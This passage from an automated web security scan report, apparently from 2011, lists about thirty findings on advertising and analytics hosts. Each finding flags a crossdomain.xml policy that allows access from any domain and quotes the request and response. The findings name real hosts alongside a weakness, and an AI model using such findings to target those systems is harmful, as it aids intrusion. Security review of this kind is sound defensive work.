Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log.go.com

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Last-Modified: Fri, 07 Jan 2011 05:47:41 GMT
Accept-Ranges: bytes
ETag: "f8e423662eaecb1:5c1"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7AdLog01
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:02:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.71. http://map.media6degrees.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"288-1225232951000"
Last-Modified: Tue, 28 Oct 2008 22:29:11 GMT
Content-Type: application/xml
Content-Length: 288
Date: Sat, 17 Sep 2011 00:53:29 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.72. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:39:29 GMT
Server: Apache/2.2.4 (Unix)
P3P: policyref="/w3c/p3p.xml", CP="NOI NID DEVo TAIo PSAo HISo OTPo OUR DELo BUS COM NAV INT DSP COR"
Content-Length: 202
Keep-Alive: timeout=5, max=19951
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.73. http://metrics.tmz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.tmz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.tmz.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:59 GMT
Server: Omniture DC/2.0.0
xserver: www4
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

5.74. http://network.realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.realmedia.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Tue, 31 Mar 2009 16:50:50 GMT
ETag: "1061e9-d0-4666d0056ce80"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0f45525d5f4f58455e445a4a423660;expires=Sat, 17-Sep-2011 01:12:17 GMT;path=/;httponly

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.75. http://oascentral.bostonherald.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.bostonherald.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: oascentral.bostonherald.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 15:55:03 GMT
ETag: "13dbbe-d0-484e9734523c0"
Accept-Ranges: bytes
Content-Length: 208
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.76. http://objects.tremormedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://objects.tremormedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: objects.tremormedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 04 Dec 2008 11:19:17 GMT
ETag: "ea70f-76-bb30d740"
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:47:22 GMT
Content-Length: 118
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.77. http://odb.outbrain.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: odb.outbrain.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"201-1311068652000"
Last-Modified: Tue, 19 Jul 2011 09:44:12 GMT
Content-Type: application/xml
Content-Length: 201
Date: Sat, 17 Sep 2011 00:56:34 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.78. http://ping.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:36:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Tue, 26 Apr 2011 18:28:26 GMT
ETag: "85d59-e0-4a1d67d69c680"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

5.79. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 17 Sep 2011 00:52:41 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.80. http://pixel.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:28 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:35:44 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

5.81. http://pixel.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1314985194000"
Last-Modified: Fri, 02 Sep 2011 17:39:54 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sat, 17 Sep 2011 01:48:33 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.82. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:29:21 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.83. http://ps2.newsinc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ps2.newsinc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ps2.newsinc.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:10:47 GMT
ETag: "069b12745fcc1:0"
Last-Modified: Tue, 10 May 2011 19:04:58 GMT
NDN-Server: PS05
NDN-SiteVer: 3.2.1
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 286
Connection: Close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<allow-ht
...[SNIP]...

5.84. http://puma.vizu.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:49 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n53.panthercdn.com
ETag: "9c515-10d-470448c0"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sat, 17 Sep 2011 19:33:27 GMT
Age: 537742
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 11 Aug 2011 17:39:23 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

5.85. http://q1.checkm8.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: q1.checkm8.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:50 GMT
Server: Apache
P3P: policyref="http://q1.checkm8.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV STA OTC"
x-internal-server: 192.168.213.15 PA-AD5
ETag: "1316192627"
Last-Modified: Fri, 16-Sep-2011 17:03:47 GMT
Age: 0
Cache-Control: max-age=86400
Content-Length: 106
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0" ?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.86. http://query.yahooapis.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://query.yahooapis.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: query.yahooapis.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Date: Sat, 17 Sep 2011 00:52:17 GMT
Server: YTS/1.19.8
Age: 1

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-policy>

5.87. http://r.casalemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.casalemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.casalemedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 25 Feb 2011 02:27:27 GMT
ETag: "15690dc-e6-1230c1c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/xml
Expires: Sat, 17 Sep 2011 01:39:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 01:39:02 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Casale Media -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.88. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sat, 17 Sep 2011 01:39:32 GMT
Content-Type: text/xml;charset=UTF-8
Date: Sat, 17 Sep 2011 01:39:31 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.89. http://r1-ads.ace.advertising.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Sat, 17 Sep 2011 01:35:29 GMT
Content-Type: text/xml
Content-Length: 81
Date: Sat, 17 Sep 2011 01:35:29 GMT
Connection: close
Set-Cookie: A07L=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=r1-ads.ace.advertising.com

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

5.90. http://r1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:05:58 GMT
ETag: "289991e-f7-44d91abfe2980"
Accept-Ranges: bytes
Content-Length: 247
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:11:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.91. http://receive.inplay.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://receive.inplay.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: receive.inplay.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1314212652000"
Last-Modified: Wed, 24 Aug 2011 19:04:12 GMT
host: rcv-srv13
Content-Type: application/xml
Content-Length: 204
Date: Sat, 17 Sep 2011 01:33:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.92. http://resources.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: resources.infolinks.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=14400
Content-Type: text/xml
Date: Sat, 17 Sep 2011 00:50:40 GMT
ETag: "870df3-52-493eb32c1c540"
Expires: Sat, 17 Sep 2011 04:50:40 GMT
Last-Modified: Sun, 31 Oct 2010 15:18:05 GMT
Server: Apache/2.2.15 (Fedora)
Content-Length: 82
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.93. http://rs.gwallet.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rs.gwallet.com

Response

HTTP/1.0 200 OK
Content-Length: 207
Server: radiumone/1.2
Content-type: text/xml; charset=UTF-8
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-domain-
...[SNIP]...

5.94. http://rt1302.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1302.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 00:59:21 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.95. http://rt1701.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1701.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1701.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 00:51:46 GMT

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.96. http://rt1702.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1702.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1702.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 01:08:20 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.97. http://rt1803.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1803.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1803.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 00:51:03 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.98. http://rt1804.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1804.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: rt1804.infolinks.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Content-Type: text/xml;charset=UTF-8
Content-Length: 82
Date: Sat, 17 Sep 2011 01:09:02 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.99. http://rt1901.infolinks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rt1901.infolinks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: rt1901.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=2

Response

HTTP/1.1 200 OK
